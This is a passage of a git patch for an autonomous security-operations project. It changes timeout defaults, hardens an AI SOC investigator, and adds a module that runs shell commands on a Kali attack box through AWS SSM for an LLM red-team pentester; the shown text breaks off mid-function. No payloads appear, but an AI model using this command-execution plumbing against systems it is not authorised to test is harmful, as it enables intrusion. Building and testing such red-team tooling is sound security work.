From ed254be1035b8483d7afb7e23fa74570e6ad643c Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 9 Jan 2026 19:19:42 -0700 Subject: [PATCH 1/5] feat: add remote command execution via AWS SSM and blue team detection query templates **Added:** - Introduced `src/ares/core/remote.py` for remote command execution on the Kali attack box via AWS SSM, including SSO credential validation, error handling, and a `run_remote` convenience function - Added `QueryTemplateTools` to `src/ares/tools/blue/query_templates.py`, providing MITRE-mapped LogQL query templates for detecting red team attack patterns and AD attacks - Registered `QueryTemplateTools` in blue team toolset and included in agent factory for investigation agent - Added `boto3>=1.42.25` as a dependency for AWS API integration **Changed:** - Updated all red team network toolsets in `src/ares/tools/red/network.py` to execute commands remotely via SSM instead of subprocess, centralizing command execution and error handling - Refactored Taskfile and documentation defaults: lowered polling mode steps to 50 and once mode steps to 15 for agent timeouts; clarified timeout behaviors in `README.md` and `docs/taskfile_usage.md` - Updated AWS region defaults in `Taskfile.yaml` from `us-west-2` to `us-west-1` - In red team orchestrator, added fail-fast SSO credential validation before starting operations - Improved admin access finding validation in red team reporting to reject error-containing results and require success indicators - Improved blue agent orchestrator with a hard signal-based timeout and robust MCP connection handling - Registered new blue team tools and query templates in import/export lists - Updated dependency and lock files (`pyproject.toml`, `uv.lock`) to add and pin `boto3` and compatible AWS packages, and remove unused aiobotocore/aioitertools - Cleaned up subprocess error handling in red team tools, removing timeouts and local file usage in favor of remote SSM execution **Removed:** - Eliminated all 
local subprocess execution for red team operations in favor of SSM-based remote execution - Removed unused and incompatible `aiobotocore` and `aioitertools` packages from lock file --- README.md | 25 +- Taskfile.yaml | 27 +- docs/taskfile_usage.md | 15 +- pyproject.toml | 1 + src/ares/agents/blue/soc_investigator.py | 255 ++- src/ares/agents/red/pentester.py | 9 + src/ares/core/factories/blue_factory.py | 7 + src/ares/core/remote.py | 408 +++++ src/ares/main.py | 1 - src/ares/tools/blue/__init__.py | 2 + src/ares/tools/blue/actions.py | 62 +- src/ares/tools/blue/grafana.py | 3 +- src/ares/tools/blue/query_templates.py | 1966 ++++++++++++++++++++++ src/ares/tools/red/network.py | 392 ++--- uv.lock | 70 +- 15 files changed, 2834 insertions(+), 409 deletions(-) create mode 100644 src/ares/core/remote.py create mode 100644 src/ares/tools/blue/query_templates.py diff --git a/README.md b/README.md index 52f373c7..cd924415 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,15 @@ # Ares - Autonomous Security Operations Agent + +
+ +[![Pre-Commit](https://github.com/dreadnode/python-template/actions/workflows/pre-commit.yaml/badge.svg)](https://github.com/dreadnode/python-template/actions/workflows/pre-commit.yaml) +[![Renovate](https://github.com/dreadnode/python-template/actions/workflows/renovate.yaml/badge.svg)](https://github.com/dreadnode/python-template/actions/workflows/renovate.yaml) +[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) + +
+ + [![Pre-Commit](https://github.com/dreadnode/ares/actions/workflows/pre-commit.yaml/badge.svg)](https://github.com/dreadnode/ares/actions/workflows/pre-commit.yaml) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) [![Python](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/downloads/) @@ -161,7 +171,7 @@ uv run python -m ares \ --args.model claude-sonnet-4-20250514 \ --args.grafana-url https://grafana.example.com \ --args.poll-interval 30 \ - --args.max-steps 150 \ + --args.max-steps 50 \ --args.report-dir ./reports # Run once and exit (process current alerts only) @@ -176,7 +186,7 @@ Investigate a specific alert by providing it as JSON: uv run python -m ares investigate-alert test-alerts/example-alert.json \ --args.model claude-sonnet-4-20250514 \ --args.grafana-url https://grafana.example.com \ - --args.max-steps 150 + --args.max-steps 15 ``` #### Red Team - Penetration Testing @@ -212,7 +222,7 @@ task ares:red: TARGET=192.168.1.100 # Or via CLI uv run python -m ares red-team 192.168.1.100 \ --args.model claude-sonnet-4-20250514 \ - --args.max-steps 150 \ + --args.max-steps 50 \ --args.report-dir ./reports ``` @@ -229,8 +239,15 @@ bloodhound-python). | `--args.model` | `claude-sonnet-4-20250514` | LLM model to use | | `--args.grafana-url` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts and MCP | | `--args.poll-interval` | `30` | Seconds between alert polls | -| `--args.max-steps` | `150` | Maximum agent steps per investigation | +| `--args.max-steps` | `50` | Maximum agent steps per investigation | | `--args.report-dir` | `./reports` | Directory for markdown reports | +| `--args.once` | `false` | Process current alerts once and exit | + +**Timeout Behavior:** + +The agent timeout is `max_steps × 60 seconds` (1 minute per step). 
When using +Taskfile, one-shot modes (`ares:blue:once:`, `ares:investigate`) default to 15 +steps (~15 min), while polling modes default to 50 steps (~50 min per alert). **Dreadnode Platform Arguments (`--dn-args.*`):** diff --git a/Taskfile.yaml b/Taskfile.yaml index 3c6a004b..958be2ff 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -15,7 +15,8 @@ vars: MODEL: '{{.MODEL | default "claude-sonnet-4-20250514"}}' GRAFANA_URL: '{{.GRAFANA_URL | default "https://grafana.dev.plundr.ai"}}' POLL_INTERVAL: '{{.POLL_INTERVAL | default "30"}}' - MAX_STEPS: '{{.MAX_STEPS | default "150"}}' + MAX_STEPS: '{{.MAX_STEPS | default "50"}}' + MAX_STEPS_ONCE: '{{.MAX_STEPS_ONCE | default "15"}}' # ~15 min max for once mode REPORT_DIR: '{{.REPORT_DIR | default "./reports"}}' DREADNODE_SERVER: '{{.DREADNODE_SERVER | default "https://platform.dev.plundr.ai/"}}' DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION | default "ares"}}' @@ -153,7 +154,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal) @@ -178,7 +179,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal) @@ -189,7 +190,7 @@ tasks: --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ --args.poll-interval {{.POLL_INTERVAL}} \ - --args.max-steps {{.MAX_STEPS}} \ + --args.max-steps {{.MAX_STEPS_ONCE}} \ --args.report-dir {{.REPORT_DIR}} \ --args.once \ --dn-args.server {{.DREADNODE_SERVER}} \ @@ -204,7 +205,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION 
| default "us-west-1"}}' cmds: - | if [ ! -f .env ]; then @@ -233,7 +234,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | if [ ! -f .env ]; then @@ -249,7 +250,7 @@ tasks: --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ --args.poll-interval {{.POLL_INTERVAL}} \ - --args.max-steps {{.MAX_STEPS}} \ + --args.max-steps {{.MAX_STEPS_ONCE}} \ --args.report-dir {{.REPORT_DIR}} \ --args.once \ --dn-args.server {{.DREADNODE_SERVER}} \ @@ -270,7 +271,7 @@ tasks: - task: check-aws-auth vars: PROFILE: '{{.PROFILE | default "infrastructure"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | export DREADNODE_API_KEY=$(op item get "Dreadnode Dev Platform" --fields api-key --reveal) @@ -280,7 +281,7 @@ tasks: uv run python -m ares investigate-alert {{.ALERT}} \ --args.model {{.MODEL}} \ --args.grafana-url {{.GRAFANA_URL}} \ - --args.max-steps {{.MAX_STEPS}} \ + --args.max-steps {{.MAX_STEPS_ONCE}} \ --args.report-dir {{.REPORT_DIR}} \ --dn-args.server {{.DREADNODE_SERVER}} \ --dn-args.token "$DREADNODE_API_KEY" \ @@ -450,7 +451,7 @@ tasks: internal: true vars: PROFILE: '{{.PROFILE | default "lab"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' cmds: - | # Check if AWS CLI is installed @@ -485,7 +486,7 @@ tasks: vars: TARGET: '{{.TARGET | default ""}}' PROFILE: '{{.PROFILE | default "lab"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' REDTEAM_PROJECT: '{{.REDTEAM_PROJECT | default "ares-redteam"}}' preconditions: - sh: test -n "{{.TARGET}}" @@ -562,11 +563,11 @@ tasks: ares:red:logs: desc: "Tail red team agent logs from Kali via SSM (usage: task ares:red:logs [KALI=instance-name] [LINES=100] [FOLLOW=true])" vars: - KALI: '{{.KALI | default "dev-alpha-operator-range-kali"}}' + 
KALI: '{{.KALI | default "staging-alpha-operator-range-kali"}}' LINES: '{{.LINES | default "100"}}' FOLLOW: '{{.FOLLOW | default "false"}}' PROFILE: '{{.PROFILE | default "lab"}}' - REGION: '{{.REGION | default "us-west-2"}}' + REGION: '{{.REGION | default "us-west-1"}}' deps: - task: check-aws-auth vars: diff --git a/docs/taskfile_usage.md b/docs/taskfile_usage.md index 9e5bf841..ba7b502c 100644 --- a/docs/taskfile_usage.md +++ b/docs/taskfile_usage.md @@ -304,13 +304,26 @@ All tasks support the following configuration variables: | `MODEL` | `claude-sonnet-4-20250514` | LLM model to use | | `GRAFANA_URL` | `https://grafana.dev.plundr.ai` | Grafana URL for alerts | | `POLL_INTERVAL` | `30` | Seconds between alert polls | -| `MAX_STEPS` | `150` | Maximum agent steps per investigation | +| `MAX_STEPS` | `50` | Maximum agent steps for polling mode (~50 min timeout) | +| `MAX_STEPS_ONCE` | `15` | Maximum agent steps for once/investigate modes (~15 min timeout) | | `REPORT_DIR` | `./reports` | Directory for markdown reports | | `DREADNODE_SERVER` | `https://platform.dev.plundr.ai/` | Dreadnode platform URL | | `DREADNODE_ORGANIZATION` | `ares` | Dreadnode organization name | | `DREADNODE_WORKSPACE` | `ares-protocol` | Dreadnode workspace name | | `DREADNODE_PROJECT` | `ares-soc` | Dreadnode project name | +**Timeout Behavior:** + +The agent timeout is calculated as `max_steps × 60 seconds` (1 minute per step): + +| Mode | Default Steps | Max Timeout | +| --- | --- | --- | +| `ares:blue:once:` | 15 | ~15 minutes | +| `ares:blue:local:once:` | 15 | ~15 minutes | +| `ares:investigate` | 15 | ~15 minutes | +| `ares:blue:` (polling) | 50 | ~50 minutes per alert | +| `ares:blue:local:` (polling) | 50 | ~50 minutes per alert | + **Example with custom variables:** ```bash diff --git a/pyproject.toml b/pyproject.toml index 2db34b49..ede9da03 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -21,6 +21,7 @@ dependencies = [ "cyclopts>=4.2.0", "loguru>=0.7.3", 
"httpx>=0.28.0,<1.0.0", + "boto3>=1.42.25", ] [project.optional-dependencies] diff --git a/src/ares/agents/blue/soc_investigator.py b/src/ares/agents/blue/soc_investigator.py index 6a4e3f16..9affbea8 100644 --- a/src/ares/agents/blue/soc_investigator.py +++ b/src/ares/agents/blue/soc_investigator.py @@ -4,6 +4,7 @@ Main agent implementation using Dreadnode Agent SDK. """ +import signal import uuid from datetime import datetime, timedelta, timezone from pathlib import Path @@ -17,6 +18,10 @@ from ares.integrations.mitre import MITREAttackClient +class InvestigationTimeoutError(Exception): + """Raised when investigation exceeds hard timeout.""" + + def build_initial_prompt(alert: dict) -> str: """Build the initial prompt with alert context. @@ -109,19 +114,28 @@ def __init__( self._mcp_tools = None async def _ensure_mcp_connection(self) -> None: - """Ensure MCP connection is established.""" + """Ensure MCP connection is established (with 60s timeout).""" + import asyncio + if self._mcp_client is None: from ares.tools.blue.grafana import connect_grafana_mcp try: logger.info("Connecting to Grafana MCP server...") - self._mcp_client = await connect_grafana_mcp( - grafana_url=self.grafana_url, - grafana_api_key=self.grafana_api_key, + self._mcp_client = await asyncio.wait_for( # type: ignore[func-returns-value] + connect_grafana_mcp( + grafana_url=self.grafana_url, + grafana_api_key=self.grafana_api_key, + ), + timeout=60.0, ) self._mcp_tools = self._mcp_client.tools tool_count = len(self._mcp_tools) if self._mcp_tools else 0 logger.success(f"Grafana MCP connected ({tool_count} tools available)") + except asyncio.TimeoutError: + logger.warning("Grafana MCP connection timed out after 60s") + logger.warning("Continuing without MCP tools") + self._mcp_tools = None except Exception as e: logger.warning(f"Failed to connect to Grafana MCP: {e}") logger.warning("Continuing without MCP tools") @@ -129,10 +143,18 @@ async def _ensure_mcp_connection(self) -> None: async def 
_shutdown_mcp(self) -> None: """Shutdown MCP connection if active.""" + import asyncio + if self._mcp_client: try: - await self._mcp_client.__aexit__(None, None, None) + # Add timeout to prevent hanging on shutdown + await asyncio.wait_for( + self._mcp_client.__aexit__(None, None, None), + timeout=10.0, + ) logger.info("Grafana MCP connection closed") + except asyncio.TimeoutError: + logger.warning("MCP shutdown timed out after 10s, forcing close") except Exception as e: logger.warning(f"Error closing MCP connection: {e}") finally: @@ -158,104 +180,163 @@ async def investigate(self, alert: dict) -> dict: - highest_pyramid_level: Highest Pyramid of Pain level reached (1-6) Raises: - TimeoutError: If investigation exceeds the configured timeout. + InvestigationTimeoutError: If investigation exceeds the hard timeout. """ investigation_id = f"inv-{uuid.uuid4().hex[:8]}" alert_name = alert.get("labels", {}).get("alertname", "unknown") logger.info(f"Starting investigation {investigation_id} for alert: {alert_name}") - # Ensure MCP connection is ready - await self._ensure_mcp_connection() + # Hard timeout using signal (works even if event loop is blocked) + # 1 minute per step + 2 minutes buffer for setup/teardown + hard_timeout_seconds = (self.max_steps * 60) + 120 + + def _timeout_handler(signum, frame): + raise InvestigationTimeoutError( + f"Investigation {investigation_id} exceeded hard timeout of {hard_timeout_seconds}s" + ) + + # Set up signal-based hard timeout (Unix only) + old_handler = signal.signal(signal.SIGALRM, _timeout_handler) + signal.alarm(hard_timeout_seconds) + logger.info(f"Hard timeout set: {hard_timeout_seconds}s ({hard_timeout_seconds // 60}m)") - # Create investigation state + # Create investigation state early so we can generate partial reports on timeout state = InvestigationState( investigation_id=investigation_id, alert=alert, ) - # Auto-extract and record MITRE technique from alert - labels = alert.get("labels", {}) - annotations = 
alert.get("annotations", {}) - for key in ["mitre_technique", "mitre", "technique_id", "technique"]: - if labels.get(key): - state.identified_techniques.add(labels[key]) - logger.info(f"Auto-recorded MITRE technique from alert: {labels[key]}") - break - if annotations.get(key): - state.identified_techniques.add(annotations[key]) - logger.info(f"Auto-recorded MITRE technique from alert: {annotations[key]}") - break - - initial_prompt = build_initial_prompt(alert) - - with dn.run(tags=["soc-investigation", alert_name]): - dn.log_params( - model=self.model, - investigation_id=investigation_id, - alert_name=alert_name, - alert_severity=alert.get("labels", {}).get("severity", "unknown"), - max_steps=self.max_steps, - mcp_tools_available=self._mcp_tools is not None, - mcp_tool_count=len(self._mcp_tools) if self._mcp_tools else 0, - ) - dn.log_input("alert", alert) - - agent = create_investigation_agent( - model=self.model, - grafana_url=self.grafana_url, - grafana_api_key=self.grafana_api_key, - mitre_client=self.mitre_client, - state=state, - grafana_mcp_tools=self._mcp_tools, - max_steps=self.max_steps, - ) - - # Run the investigation with timeout - try: - import asyncio - - logger.info(f"Starting agent.run() with max_steps={self.max_steps}") - - # Add a generous timeout (5 minutes per step) - timeout_seconds = self.max_steps * 300 # 5 minutes per step - - result = await asyncio.wait_for( - agent.run(initial_prompt), - timeout=timeout_seconds, + try: + # Ensure MCP connection is ready + await self._ensure_mcp_connection() + + # Auto-extract and record MITRE technique from alert + labels = alert.get("labels", {}) + annotations = alert.get("annotations", {}) + for key in ["mitre_technique", "mitre", "technique_id", "technique"]: + if labels.get(key): + state.identified_techniques.add(labels[key]) + logger.info(f"Auto-recorded MITRE technique from alert: {labels[key]}") + break + if annotations.get(key): + state.identified_techniques.add(annotations[key]) + 
logger.info(f"Auto-recorded MITRE technique from alert: {annotations[key]}") + break + + initial_prompt = build_initial_prompt(alert) + + with dn.run(tags=["soc-investigation", alert_name]): + dn.log_params( + model=self.model, + investigation_id=investigation_id, + alert_name=alert_name, + alert_severity=alert.get("labels", {}).get("severity", "unknown"), + max_steps=self.max_steps, + mcp_tools_available=self._mcp_tools is not None, + mcp_tool_count=len(self._mcp_tools) if self._mcp_tools else 0, ) + dn.log_input("alert", alert) - logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}") - - # Generate report - report_path = self._generate_report(state, result) - - dn.log_output("report_path", str(report_path)) - dn.log_metric("investigation_success", 1) - - return { - "investigation_id": investigation_id, - "status": "completed" if not state.escalated else "escalated", - "report_path": str(report_path), - "evidence_count": len(state.evidence), - "techniques_identified": list(state.identified_techniques), - "highest_pyramid_level": state.highest_pyramid_level, - } - - except asyncio.TimeoutError as timeout_err: - logger.error(f"Investigation timed out after {timeout_seconds}s") - logger.error( - f"Current state: {len(state.evidence)} evidence items, {len(state.timeline)} timeline events" + agent = create_investigation_agent( + model=self.model, + grafana_url=self.grafana_url, + grafana_api_key=self.grafana_api_key, + mitre_client=self.mitre_client, + state=state, + grafana_mcp_tools=self._mcp_tools, + max_steps=self.max_steps, ) - dn.log_metric("investigation_timeout", 1) - raise TimeoutError( - f"Investigation exceeded {timeout_seconds}s timeout" - ) from timeout_err - except Exception as e: - logger.error(f"Investigation failed: {e}") - dn.log_metric("investigation_failed", 1) - raise + # Run the investigation with asyncio timeout (backup to signal timeout) + try: + import asyncio + + logger.info(f"Starting agent.run() with 
max_steps={self.max_steps}") + + # Asyncio timeout as secondary measure + timeout_seconds = self.max_steps * 60 + + result = await asyncio.wait_for( + agent.run(initial_prompt), + timeout=timeout_seconds, + ) + + logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}") + + # Check if agent hit max_steps without proper completion + status = "completed" + if state.escalated: + status = "escalated" + elif result.stop_reason and "max" in str(result.stop_reason).lower(): + status = "incomplete" + logger.warning( + f"Agent reached max_steps ({self.max_steps}) without completion" + ) + + # Generate report + report_path = self._generate_report(state, result) + + dn.log_output("report_path", str(report_path)) + dn.log_metric("investigation_success", 1) + + return { + "investigation_id": investigation_id, + "status": status, + "report_path": str(report_path), + "evidence_count": len(state.evidence), + "techniques_identified": list(state.identified_techniques), + "highest_pyramid_level": state.highest_pyramid_level, + } + + except asyncio.TimeoutError: + logger.error(f"Investigation timed out after {timeout_seconds}s (asyncio)") + logger.error( + f"Current state: {len(state.evidence)} evidence items, " + f"{len(state.timeline)} timeline events" + ) + dn.log_metric("investigation_timeout", 1) + + # Still generate a partial report on timeout + report_path = self._generate_report(state, None) + return { + "investigation_id": investigation_id, + "status": "timeout", + "report_path": str(report_path), + "evidence_count": len(state.evidence), + "techniques_identified": list(state.identified_techniques), + "highest_pyramid_level": state.highest_pyramid_level, + } + + except Exception as e: + logger.error(f"Investigation failed: {e}") + dn.log_metric("investigation_failed", 1) + raise + + except InvestigationTimeoutError: + logger.error(f"Investigation hit HARD TIMEOUT after {hard_timeout_seconds}s") + logger.error( + f"Current state: {len(state.evidence)} 
evidence items, " + f"{len(state.timeline)} timeline events" + ) + dn.log_metric("investigation_hard_timeout", 1) + + # Generate partial report + report_path = self._generate_report(state, None) + return { + "investigation_id": investigation_id, + "status": "hard_timeout", + "report_path": str(report_path), + "evidence_count": len(state.evidence), + "techniques_identified": list(state.identified_techniques), + "highest_pyramid_level": state.highest_pyramid_level, + } + + finally: + # Always cancel the alarm and restore old handler + signal.alarm(0) + signal.signal(signal.SIGALRM, old_handler) + logger.debug("Hard timeout signal handler cleaned up") def _generate_report(self, state: InvestigationState, _result) -> Path: """Generate the markdown investigation report.""" diff --git a/src/ares/agents/red/pentester.py b/src/ares/agents/red/pentester.py index d976f3f1..f72a5daf 100644 --- a/src/ares/agents/red/pentester.py +++ b/src/ares/agents/red/pentester.py @@ -12,6 +12,7 @@ from ares.core.factories.red_factory import create_redteam_agent from ares.core.models import RedTeamState, Target +from ares.core.remote import SSOTokenExpiredError, validate_sso_credentials from ares.core.templates import get_template_loader from ares.integrations.mitre import MITREAttackClient from ares.reports.redteam import RedTeamReportGenerator @@ -87,6 +88,14 @@ async def execute_operation(self, target_ip: str) -> dict: logger.info(f"Starting red team operation {operation_id} against: {target_ip}") + # Validate SSO credentials before starting - fail fast if expired + try: + validate_sso_credentials() + logger.info("AWS SSO credentials validated successfully") + except SSOTokenExpiredError as e: + logger.error(f"Cannot start operation - {e}") + raise + # Create operation state state = RedTeamState( operation_id=operation_id, diff --git a/src/ares/core/factories/blue_factory.py b/src/ares/core/factories/blue_factory.py index 39022545..5cc06de2 100644 --- 
a/src/ares/core/factories/blue_factory.py +++ b/src/ares/core/factories/blue_factory.py @@ -15,6 +15,7 @@ CompletionTools, GrafanaTools, InvestigationTools, + QueryTemplateTools, QuestionEngineTools, escalate_investigation, ) @@ -120,6 +121,11 @@ def create_investigation_agent( completion_tools = CompletionTools() completion_tools.set_state(state) + # Query templates for pre-built attack detection queries + # Uses Grafana URL to derive Loki endpoint (assumes /loki proxy) + loki_url = grafana_url.rstrip("/") + query_template_tools = QueryTemplateTools(loki_url=loki_url) + # Build tool list tools: list = [ grafana_tools, @@ -127,6 +133,7 @@ def create_investigation_agent( question_tools, mitre_tools, completion_tools, + query_template_tools, escalate_investigation, ] diff --git a/src/ares/core/remote.py b/src/ares/core/remote.py new file mode 100644 index 00000000..9a4c80c3 --- /dev/null +++ b/src/ares/core/remote.py @@ -0,0 +1,408 @@ +"""Remote command execution via AWS SSM. + +This module provides functionality to execute commands on remote EC2 instances +(specifically the Kali attack box) using AWS Systems Manager (SSM). +""" + +import os +import time +from dataclasses import dataclass +from typing import Any, NoReturn + +import boto3 +from botocore.exceptions import ClientError, SSOTokenLoadError, TokenRetrievalError +from loguru import logger + + +class SSOTokenExpiredError(Exception): + """Raised when AWS SSO token has expired and needs refresh.""" + + +@dataclass +class CommandResult: + """Result of a remote command execution.""" + + stdout: str + stderr: str + return_code: int + success: bool + + @property + def output(self) -> str: + """Combined stdout and stderr output.""" + if self.stderr: + return f"{self.stdout}\n{self.stderr}" + return self.stdout + + +class SSMExecutor: + """Execute commands on remote EC2 instances via AWS SSM. + + This class handles command execution on the Kali attack box using + AWS Systems Manager send-command API. 
+ + Attributes: + instance_id: EC2 instance ID of the target (Kali box) + profile: AWS profile name for authentication + region: AWS region + """ + + def __init__( + self, + instance_id: str | None = None, + instance_name: str | None = None, + profile: str = "lab", + region: str = "us-west-1", + ): + """Initialize the SSM executor. + + Args: + instance_id: EC2 instance ID (if known) + instance_name: EC2 instance Name tag to resolve to instance ID + profile: AWS profile name + region: AWS region + """ + self.profile = profile + self.region = region + self._instance_id = instance_id + self._instance_name = instance_name or os.environ.get( + "ARES_KALI_INSTANCE", "staging-alpha-operator-range-kali" + ) + self._ssm_client: Any = None + self._ec2_client: Any = None + + def _create_session(self) -> boto3.Session: + """Create a boto3 session, validating SSO token first.""" + try: + session = boto3.Session(profile_name=self.profile, region_name=self.region) + # Force credential resolution to catch SSO errors early + credentials = session.get_credentials() + if credentials is None: + raise SSOTokenExpiredError( # noqa: TRY301 + f"No credentials available for profile '{self.profile}'. 
" + f"Run: aws sso login --profile {self.profile}" + ) + # Try to actually use the credentials to validate them + credentials.get_frozen_credentials() + return session + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except Exception as e: + if "token" in str(e).lower() and ( + "expired" in str(e).lower() or "sso" in str(e).lower() + ): + self._handle_sso_error(e) + raise + + def _handle_sso_error(self, original_error: Exception) -> NoReturn: + """Handle SSO token errors with helpful message and optional auto-refresh.""" + error_msg = ( + f"\n{'=' * 60}\n" + f"AWS SSO TOKEN EXPIRED\n" + f"{'=' * 60}\n" + f"Your AWS SSO session has expired.\n\n" + f"To fix this, run:\n" + f" aws sso login --profile {self.profile}\n\n" + f"Original error: {original_error}\n" + f"{'=' * 60}\n" + ) + logger.error(error_msg) + + # Clear cached clients so next attempt will re-authenticate + self._invalidate_clients() + + raise SSOTokenExpiredError( + f"AWS SSO token expired for profile '{self.profile}'. 
" + f"Run: aws sso login --profile {self.profile}" + ) from original_error + + def _invalidate_clients(self) -> None: + """Clear cached clients to force re-authentication on next use.""" + self._ssm_client = None + self._ec2_client = None + self._instance_id = None + + @property + def ssm_client(self) -> Any: + """Lazy-load SSM client with SSO token validation.""" + if self._ssm_client is None: + session = self._create_session() + self._ssm_client = session.client("ssm") + return self._ssm_client + + @property + def ec2_client(self) -> Any: + """Lazy-load EC2 client with SSO token validation.""" + if self._ec2_client is None: + session = self._create_session() + self._ec2_client = session.client("ec2") + return self._ec2_client + + @property + def instance_id(self) -> str: + """Resolve and return the instance ID.""" + if self._instance_id is None: + self._instance_id = self._resolve_instance_id() + return self._instance_id + + def _resolve_instance_id(self) -> str: + """Resolve instance name to instance ID via EC2 API.""" + try: + response = self.ec2_client.describe_instances( + Filters=[ + {"Name": "tag:Name", "Values": [self._instance_name]}, + {"Name": "instance-state-name", "Values": ["running"]}, + ] + ) + + for reservation in response.get("Reservations", []): + for instance in reservation.get("Instances", []): + instance_id = instance.get("InstanceId") + if instance_id: + logger.info( + f"Resolved Kali instance '{self._instance_name}' to {instance_id}" + ) + return instance_id + + raise RuntimeError(f"No running instance found with name '{self._instance_name}'") # noqa: TRY301 + + except SSOTokenExpiredError: + raise + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except ClientError as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise RuntimeError(f"Failed to resolve instance ID: {e}") from e + except Exception as e: + 
error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise + + def run_command( + self, + command: str | list[str], + timeout_seconds: int = 300, + working_directory: str = "/tmp", # noqa: S108 # nosec B108 + ) -> CommandResult: + """Execute a command on the remote instance via SSM. + + Args: + command: Command string or list of command parts + timeout_seconds: Maximum time to wait for command completion + working_directory: Directory to execute command in + + Returns: + CommandResult with stdout, stderr, and return code + """ + command_str = " ".join(command) if isinstance(command, list) else command + + # Wrap command to capture exit code and handle errors + wrapped_command = f""" +cd {working_directory} +{command_str} +EXIT_CODE=$? +exit $EXIT_CODE +""" + + try: + logger.debug(f"SSM executing: {command_str[:100]}...") + + response = self.ssm_client.send_command( + InstanceIds=[self.instance_id], + DocumentName="AWS-RunShellScript", + Parameters={"commands": [wrapped_command]}, + TimeoutSeconds=timeout_seconds, + ) + + command_id = response["Command"]["CommandId"] + logger.debug(f"SSM command ID: {command_id}") + + # Wait for command to complete + return self._wait_for_command(command_id, timeout_seconds) + + except SSOTokenExpiredError: + # Re-raise SSO errors without wrapping + raise + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except ClientError as e: + # Check if this is an SSO-related error + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + error_msg = f"SSM command failed: {e}" + logger.error(error_msg) + return CommandResult( + stdout="", + stderr=error_msg, + return_code=1, + success=False, + ) + except Exception as e: + # Catch any other SSO-related errors + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in 
error_str): + self._handle_sso_error(e) + raise + + def _wait_for_command( + self, + command_id: str, + timeout_seconds: int, + ) -> CommandResult: + """Wait for SSM command to complete and return result.""" + start_time = time.time() + poll_interval = 2 # seconds + + while True: + elapsed = time.time() - start_time + if elapsed > timeout_seconds: + return CommandResult( + stdout="", + stderr=f"Command timed out after {timeout_seconds} seconds", + return_code=124, + success=False, + ) + + try: + response = self.ssm_client.get_command_invocation( + CommandId=command_id, + InstanceId=self.instance_id, + ) + + status = response.get("Status", "") + + if status in ("Success", "Failed", "Cancelled", "TimedOut"): + stdout = response.get("StandardOutputContent", "") + stderr = response.get("StandardErrorContent", "") + return_code = response.get("ResponseCode", -1) + + # Handle None return code + if return_code is None: + return_code = 0 if status == "Success" else 1 + + success = status == "Success" and return_code == 0 + + logger.debug( + f"SSM command completed: status={status}, return_code={return_code}" + ) + + return CommandResult( + stdout=stdout, + stderr=stderr, + return_code=return_code, + success=success, + ) + + # Still pending, wait and retry + time.sleep(poll_interval) + + except SSOTokenExpiredError: + raise + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except ClientError as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + if "InvocationDoesNotExist" in str(e): + # Command not yet visible, wait and retry + time.sleep(poll_interval) + continue + raise + except Exception as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise + + +# Global executor instance (lazy-loaded) +_executor: SSMExecutor | None = None + + +def get_executor() -> 
